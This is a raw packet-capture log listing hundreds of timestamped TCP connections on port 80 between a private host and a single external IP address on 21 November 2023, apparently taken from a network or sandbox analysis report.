                                                            Nov 21, 2023 04:47:55.051307917 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.051373005 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.051578045 CET4975680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.123372078 CET804975577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.129759073 CET804975577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.181766033 CET4975580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.250566959 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.250580072 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.259167910 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.306884050 CET4975680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.384208918 CET4975580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.384771109 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.384773016 CET4975680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.582427979 CET804975677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.582494020 CET4975680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.582596064 CET804975577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.582652092 CET4975580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.583662987 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.583731890 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.583935976 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.782645941 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.782804012 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.789611101 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:55.989742994 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.989762068 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:55.996412992 CET804975777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.041210890 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.144445896 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.347338915 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.347441912 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.347644091 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.545540094 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.545571089 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.545799017 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.744704008 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.750597000 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:56.791136980 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.868308067 CET4975780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.869185925 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:56.870999098 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.067055941 CET804975877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.067167997 CET4975880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.068819046 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.068900108 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.069133997 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.268913031 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.268942118 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.269268036 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.468873024 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.468888044 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.475258112 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.525583029 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.601766109 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.602195978 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.800991058 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.801081896 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.801287889 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.801572084 CET804975977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.801628113 CET4975980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:57.997977972 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.998136044 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:57.998382092 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.195152044 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.195171118 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.201750040 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.244291067 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.321496964 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.321985960 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.518332005 CET804976077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.518435001 CET4976080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.519632101 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.519718885 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.522582054 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.720068932 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.720407963 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.720709085 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:58.918642044 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.918663025 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.925018072 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:58.978635073 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.037945986 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.038423061 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.236315012 CET804976177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.236337900 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.236419916 CET4976180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.236464024 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.236670971 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.434570074 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.434784889 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.434998035 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.632997036 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.633013964 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.637718916 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.681770086 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.757718086 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.758158922 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.959538937 CET804976277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.959714890 CET4976280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.960377932 CET804976377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:59.960464954 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:59.960717916 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.135584116 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.136158943 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.159384012 CET804976377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.159409046 CET804976377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.159478903 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.258013010 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.333564043 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.333648920 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.333837032 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.338649988 CET804976377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.338682890 CET804976377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.338733912 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.338783979 CET4976380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.455733061 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.455847025 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.456012964 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.531249046 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.531379938 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.531569958 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.658411026 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.658432961 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.658720016 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.729029894 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.733994961 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.775501013 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.858922005 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.859077930 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.863715887 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:00.916192055 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.992800951 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.993026972 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:00.993325949 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.192212105 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.192321062 CET804976477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.192333937 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.192372084 CET4976480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.192553997 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.192998886 CET804976577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.193049908 CET4976580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.388948917 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.389041901 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.389336109 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.585875988 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.585890055 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.590692997 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.590945005 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.712235928 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.787511110 CET804976677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.787616014 CET4976680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.911761999 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:01.911849976 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:01.912075996 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.110665083 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.110807896 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.111066103 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.309868097 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.314310074 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.369282007 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.430011034 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.430418015 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.628051043 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.628169060 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.628360987 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.628508091 CET804976777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.628565073 CET4976780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:02.825922012 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.826001883 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:02.826369047 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.024236917 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.024262905 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.029112101 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.072446108 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.148699999 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.148869991 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.346729040 CET804976877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.346841097 CET4976880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.347685099 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.347759008 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.347954988 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.546835899 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.546896935 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.547147036 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.750180006 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.750196934 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.755608082 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:03.806776047 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.881432056 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:03.881839037 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.079725027 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.079878092 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.080090046 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.080341101 CET804976977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.080410957 CET4976980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.278013945 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.278098106 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.278456926 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.476471901 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.476491928 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.481086016 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.525633097 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.601267099 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.601682901 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.799194098 CET804977077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.799292088 CET4977080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.800342083 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.800422907 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.800623894 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:04.999243975 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.999392986 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:04.999623060 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.199016094 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.199032068 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.205761909 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.259901047 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.322365999 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.322621107 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.322623014 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.520191908 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.520281076 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.520483971 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.521193027 CET804977177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.521261930 CET4977180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.718110085 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.718169928 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.718548059 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.745877981 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.746191025 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.883390903 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.916187048 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.916203976 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.921027899 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.921109915 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.950217962 CET804977277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.950294018 CET4977280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.950700045 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:05.950778008 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:05.950911999 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.080101013 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.080246925 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.084899902 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.152092934 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.152107000 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.152419090 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.281493902 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.281615973 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.281907082 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.354484081 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.358747005 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.400633097 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.478526115 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.478543997 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.485061884 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.525650978 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.602619886 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.602638006 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.603363991 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.799192905 CET804977477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.799293041 CET4977480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.801326036 CET804977377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.801567078 CET4977380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.802047014 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:06.802139044 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:06.802329063 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.001017094 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.001066923 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.001455069 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.200292110 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.200309038 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.205137968 CET804977577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.259922981 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.325367928 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.522814989 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.522933006 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.523130894 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.720604897 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.720772028 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.721007109 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:07.919526100 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.919539928 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.924458981 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:07.978683949 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.039118052 CET4977580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.039612055 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.040055037 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.237109900 CET804977677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.237210035 CET4977680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.237668037 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.237751961 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.237934113 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.439120054 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.439186096 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.439804077 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.637481928 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.637502909 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.642436981 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.697519064 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.758553028 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.758645058 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.956185102 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.956202030 CET804977777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:08.956271887 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.956305981 CET4977780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:08.956479073 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.155263901 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.155344963 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.155574083 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.357125998 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.357142925 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.359371901 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.400566101 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.476461887 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.476993084 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.673782110 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.673861027 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.674050093 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.674067020 CET804977877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.674120903 CET4977880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:09.870701075 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.870726109 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:09.871032000 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.067698956 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.067723989 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.072663069 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.119308949 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.197251081 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.197875977 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.393780947 CET804977977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.394035101 CET4977980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.395385981 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.395488977 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.395653963 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.593280077 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.593367100 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.593626022 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.791194916 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.791207075 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.796176910 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:10.838048935 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.917229891 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:10.917794943 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.114444971 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.114562988 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.114679098 CET804978077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.114725113 CET4978080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.114900112 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.311650038 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.311685085 CET804978177.91.124.101192.168.2.5
